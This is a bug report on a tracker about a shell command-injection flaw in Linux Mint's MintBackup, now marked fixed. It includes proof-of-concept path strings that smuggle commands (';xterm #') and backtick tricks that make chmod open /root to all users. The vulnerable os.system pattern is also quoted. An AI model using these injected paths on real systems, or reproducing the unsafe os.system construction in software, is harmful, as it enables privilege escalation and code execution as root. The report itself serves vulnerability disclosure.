MintBackup executes Code when package_dest Path contains Shell commands
Bug #1462313 reported by
Bernd Dietzel
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Linux Mint |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
File :
/usr/lib/
Line :
1465
Code :
os.system("chmod a+rw " + os.path.
Exploid Demo : ... if "self.package_dest" is a path like this :
/tmp/;xterm #/backup/
... the program xterm will be launched as root when you try to save a package selection backup to this path.
this is bacause ";xterm;" contains the shell comamnd char ";" wich will make xterm be executed by os.system.
If the destionation path is on an external drive or internet share with a path name in the hands of other people,
this can be a security issure.
Please do not use os.system anywhere.
Thanks ;-)
description: | updated |
information type: | Private Security → Public Security |
summary: |
- MinBackup executes Code when package_dest Path contains Shell commands + MintBackup executes Code when package_dest Path contains Shell commands |
Changed in linuxmint: | |
status: | New → Fix Released |
To post a comment you must log in.
Another Exploid Demo : ======= =======
=======
I could make the root folder read+Executefor ALL !!! users simply trick somene to use this Backup Path :
/home/theregrun ner/test /r`endez-vous avec Ocean of Tears `oot/
where theregrunner is my user name.
The folder "test " has as space at the end , thats important and leads to the privilige escalation
The text `endez-vous avec Ocean of Tears ` is just a camouflage to hide the root folder Path.
-->the charater ` tells the shell to start the Programm "endez-vous" .... it is not there ... so result is an empty string.
this leads to this :
os.system("chmod a+rx " + self.package_dest) ner/test /r`endez-vous avec Ocean of Tears `oot/" )
os.system("chmod a+rx /home/theregrun
===> os.system("chmod a+rx /home/theregrun ner/test /root/" )
the space in the test folder name makes chmod to modify two Paths, not only one , and this is equal as this two commands :
chmod a+rx /home/theregrun ner/test
chmod a+rx /root/
so before we had :
ls -al
drwx------ 13 root root 4096 Jun 3 22:16 root ( before )
and now wie have a privilege escalation :
ls -al
drwxr-xr-x 13 root root 4096 Jun 3 22:16 root
And now where are really in an Ocean of Tears :-((
by the way .. i now the spelling of the french word was not correct but nessesary for the attack demo to work ;-)